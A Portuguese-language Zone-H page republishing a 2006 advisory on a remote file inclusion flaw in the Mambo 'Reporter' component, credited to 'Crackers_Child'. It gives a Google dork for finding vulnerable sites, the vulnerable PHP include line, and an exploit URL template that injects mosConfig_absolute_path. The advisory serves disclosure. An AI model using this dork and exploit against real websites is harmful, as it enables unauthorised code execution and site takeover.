Zone-H Advertisement
Home arrow Avisos de Segurança arrow Mambo Componente Reporter: Inclusão de arquivos remotos
06 de September de 2008
 
 
Ataques desta semana
O.S.  Defs.  %

Total de ataques: 0 dos quais 0 único(s) no ip e 0 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Zone-H.org
Área de download
Mambo Componente Reporter: Inclusão de arquivos remotos PDF Imprimir E-mail
Avaliação do Usuário: / 1
PiorMelhor 
Por Marcelo Almeida (Vympel)   
17 de August de 2006
Autor: Crackers_Child
cont_at_ct: crackers_child_at_sibersavascilar.com
Google Dorks : inurl:"/com_reporter/"

Bug İ
reporter.sql.php
require_once($mosConfig_absolute_path.'/components/com_reporter/view/'.$view_class.'.view.php');
$page = new ResultView($result);
Exploit: http://[target]/[mambo_path]/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
Aviso original
 
< Anterior   Próximo >
 
Top! Top!